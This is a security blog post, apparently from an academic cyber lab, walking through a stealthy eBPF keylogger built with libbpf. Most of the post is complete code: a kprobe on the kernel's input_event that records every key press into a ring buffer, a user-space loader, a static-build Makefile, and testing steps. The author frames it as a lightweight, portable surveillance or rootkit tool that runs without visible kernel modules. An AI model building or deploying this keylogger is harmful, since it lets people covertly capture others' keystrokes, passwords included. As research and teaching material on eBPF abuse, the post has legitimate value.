Offensive eBPF - Building a Keylogger with libbpf

Feb 5, 2026 by Zacharia Mansouri | 104 views

Linux Offensive Security eBPF

https://cylab.be/blog/482/offensive-ebpf-building-a-keylogger-with-libbpf

Sophisticated surveillance tools do not always need to break the system. Often, they simply use it exactly as intended. Imagine a single, lightweight binary capable of running on many Linux server regardless of the underlying kernel version. It silently captures every keystroke without requiring a compiler on the target or loading visible kernel modules. In a previous blog post, we explored this concept using a simple bpftrace script. In this one, we will take that logic and port it to libbpf. This allows us to move away from runtime dependencies and build a standalone C application that leverages Ring Buffers for efficient event processing.

keylogger-libbpf.png

In a previous blog post , we used bpftrace to rapidly prototype a keylogger. While bpftrace is excellent for one-liners and quick investigations, it relies on the LLVM backend to compile scripts at runtime, which adds startup latency and requires heavy dependencies on the target machine. For building robust, production-grade security tools (or rootkits), we need to move to libbpf. This is the modern standard for eBPF development. It allows us to write Compile Once - Run Everywhere (CO-RE) applications that are lightweight, pre-compiled binaries, and extremely fast. In this post, we will port our keylogger logic from a script to a full-fledged C application using libbpf and Ring Buffers for high-performance data exfiltration.

The Mechanism: Ring Buffers and CO-RE

The older way of writing BPF tools (using the BCC framework) required the Python runtime to compile C code on the fly, effectively requiring the target machine to have kernel headers and a compiler installed. libbpf solves this with CO-RE that ensures:

  • Portability: We use a file called vmlinux.h that contains every type definition used by the kernel.
  • Efficiency: The BPF program is compiled ahead of time into an object file.
  • Modern Maps: We replace older methods with BPF Ring Buffers, a shared memory region that allows the kernel to push data to user space with minimal overhead.

Part 1: The Kernel Payload (program.bpf.c)

This file runs inside the kernel. Its only job is to hook the input_event function, filter for key presses, and push the data into a Ring Buffer.

The Setup and Constants

First, we define our environment. Notice we don’t include <linux/sched.h> or other system headers. Instead, we include "vmlinux.h". This single file will be generated by bpftool and contains definitions for every struct, union, and typedef in the running kernel.

We also define the structure of the data we want to export: the timestamp (ts) and the key code (code).

#include <linux/types.h> // for types like __u64
#include <linux/ptrace.h> // for structs like pt_regs and macros like PT_REGS_PARM2
#include <linux/bpf.h> // for identifiers like BPF_MAP_TYPE_RINGBUF

#include "vmlinux.h"
#define __TARGET_ARCH_x86 // satisfy PT_REGS_PARMx

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> // for PT_REGS_PARMx
#include <linux/input-event-codes.h> // safe for EV_KEY

struct key_event_t {
    __u64 ts;
    __u32 code;
};

char LICENSE[] SEC("license") = "GPL";

Defining the Ring Buffer

We define a map called events of type BPF_MAP_TYPE_RINGBUF. This acts as a circular queue. The kernel writes to the tail, and our user-space app reads from the head. We allocate a generous 16MB buffer (1 << 24) to ensure we never drop a keystroke, even under heavy load.

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); // 16MB
} events SEC(".maps");

The Hook: Capturing the Input

We attach our function to kprobe/input_event. Just like in our previous blog post, when using a bpftrace script, we’ll need to access the arguments. However, in compiled C, we use architecture-specific macros (PT_REGS_PARM2, etc.) to read the CPU registers where the arguments are stored:

  • PARM1 (input_dev): The pointer to the input device name (we won’t use it here).
  • PARM2 (type): Checks if it is a keyboard event (EV_KEY).
  • PARM3 (code): The actual key being pressed.
  • PARM4 (value): The state (e.g. pressed, released).
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type = PT_REGS_PARM2(ctx);
    __u32 code = PT_REGS_PARM3(ctx);
    __s32 value = PT_REGS_PARM4(ctx);

    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;

        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;

        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;

        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }

    return 0;
}

Part 2: The Agent (program.c)

The user-space component loads the BPF program and “consumes” the events from the ring buffer. Among the included headers, program.skel.h is an auto-generated header file that creates a C struct representing our BPF program. It handles all the low-level work of creating maps, loading bytecode, and attaching probes. This reduces hundreds of lines of boilerplate code into just open, load, and attach.

The Callback Function

This function is triggered automatically by libbpf whenever new data arrives in the ring buffer. It simply casts the raw memory to our key_event_t struct and prints it.

#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> // to avoid implicit declaration of functions such as bpf_map_update_elem()
#include "program.skel.h"

struct key_event_t { 
    __u64 ts; 
    __u32 code; 
}; 

static int handle_event(void *ctx, void *data, size_t len) {
    struct key_event_t *event = data;
    printf("Key code: %u at time %llu\n", event->code, event->ts);
    return 0;
}

Loading and Attaching

Inside the main function, we perform the lifecycle management. program_bpf__open_and_load() is a convenience function that handles verifying the BPF bytecode with the kernel. program_bpf__attach() activates the kprobes.

int main() {
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }

    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        return 1;
    }

The Polling Loop

Finally, we set up the ring buffer manager. We link it to the file descriptor of our events map and pass our handle_event callback. The while loop essentially puts the program to sleep until the kernel wakes it up with new data.

    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) return 1;

    while (1) {
        ring_buffer__poll(rb, -1);  // blocks until event arrives
    }

    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}

Testing with a Virtual Input

If you are developing this on a headless server or a VM, you might not have a physical keyboard attached. In order to verify that the tool works, we can simulate hardware input events using a program called input-emulator.

  1. Install the emulator
sudo apt install meson # If not installed already (other dependencies might be missing)
git clone https://github.com/tio/input-emulator
cd input-emulator
meson build
meson compile -C build
sudo meson install -C build
  1. Run the eBPF program

Launch the compiled binary in your first terminal:

sudo ./program
  1. Simulate keystrokes

In a second terminal, spin up the virtual keyboard and type the letter 'a':

sudo input-emulator start kbd # Start virtual keyboard
sudo input-emulator kbd key a # Press a virtual key

The agent will output:

Key code: 30 at time 17356892
...

Full Code

To keep the project structure clean and standardized, this code follows the pattern outlined in the eBPF CO-RE guide. This ensures we are using modern CO-RE best practices, separating the kernel logic, the user-space controller, and the build system into distinct, manageable components.

Hereunder is the complete source code for the project.

The Kernel Payload (program.bpf.c)

#include <linux/types.h>
#include <linux/ptrace.h>
#include <linux/bpf.h>
#include <linux/input-event-codes.h> // Such as EV_KEY
#include "vmlinux.h" // CO-RE types

#define __TARGET_ARCH_x86

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

struct key_event_t {
    __u64 ts;
    __u32 code;
};

// Ring buffer for user-space events (16MB)
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24);
} events SEC(".maps");

// Hook: void input_event(struct input_dev *dev, unsigned int type, unsigned int code, int value)
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type  = PT_REGS_PARM2(ctx); // arg2: type
    __u32 code  = PT_REGS_PARM3(ctx); // arg3: key code
    __s32 value = PT_REGS_PARM4(ctx); // arg4: state (0=up, 1=down)

    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;

        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;

        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;

        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }

    return 0;
}

char LICENSE[] SEC("license") = "GPL";

The User Code (program.c)

#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> 
#include "program.skel.h" // Auto-generated header via bpftool

// Matches memory layout of struct in kernel code
struct key_event_t {
    __u64 ts;
    __u32 code;
};

// Callback triggered when data arrives from the kernel
static int handle_event(void *ctx, void *data, size_t len) {
    struct key_event_t *event = data; // Cast raw bytes to event struct
    printf("Key code: %u at time %llu\n", event->code, event->ts);
    return 0;
}

int main() {
    // Load bytecode and verify maps
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }

    // Attach bpf program to kernel hooks
    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        return 1;
    }

    // Configure the ring buffer consumer with a callback
    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) return 1;

    while (1) {
        // Block indefinitely until an event occurs
        ring_buffer__poll(rb, -1);
    }

    // Free the resources
    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}

Build System (Makefile)

To build this, simply run make. It handles generating vmlinux.h, compiling the BPF code to bytecode, generating the skeleton header, and linking the final binary.

# Compiler settings
BPF_CLANG=clang

# Kernel side flags
BPF_CFLAGS=-g -O2 -target bpf

# Userspace side flags
# FIX: Added -std=gnu99 to prevent C23 symbol issues (like __isoc23_strtoull)
USER_CFLAGS=-g -O2 -std=gnu99

# --- LIBBPF CONFIG ---
# Point to the library we built locally
LIBBPF_DIR = ./libbpf/build
LIBBPF_OBJ = $(LIBBPF_DIR)/libbpf.a

# Include the headers we installed into libbpf/build/usr/include
# We also include uapi for kernel definitions if needed
INCLUDES = -I$(LIBBPF_DIR)/usr/include -I./libbpf/include/uapi

# Link Statically: Bundles libbpf into the binary
STATIC_LDFLAGS = -static -Wl,--whole-archive $(LIBBPF_OBJ) -Wl,--no-whole-archive -lelf -lz

# Project Name
NAME=program
BPFOBJ=$(NAME).bpf.o
SKELETON=$(NAME).skel.h
EXEC=$(NAME)

# --- TARGETS ---

# Build User-Space Executable
$(EXEC): $(SKELETON) $(NAME).c
	$(BPF_CLANG) $(USER_CFLAGS) $(INCLUDES) $(NAME).c $(STATIC_LDFLAGS) -o $(EXEC)

# Build BPF Kernel Object
$(BPFOBJ): $(NAME).bpf.c vmlinux.h
	$(BPF_CLANG) $(BPF_CFLAGS) $(INCLUDES) -c $(NAME).bpf.c -o $(BPFOBJ)

# Generate vmlinux.h (The "All-in-One" Kernel Header)
vmlinux.h:
	bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Generate Skeleton Header (Bridge between Kernel and User)
$(SKELETON): $(BPFOBJ)
	bpftool gen skeleton $(BPFOBJ) > $(SKELETON)

clean:
	- rm -f *.o *.skel.h vmlinux.h $(EXEC)

Conclusion

The move from a script based workflow to a compiled engineering model is a real step up, with libbpf and Ring Buffers giving us something that uses far less CPU than bpftrace, stays within the verifier’s safety rails, and can run on other machines with similar kernels without dragging along heavy dependencies.

References

This blog post is licensed under CC BY-SA 4.0

This website uses cookies. More information about the use of cookies is available in the cookies policy.
Accept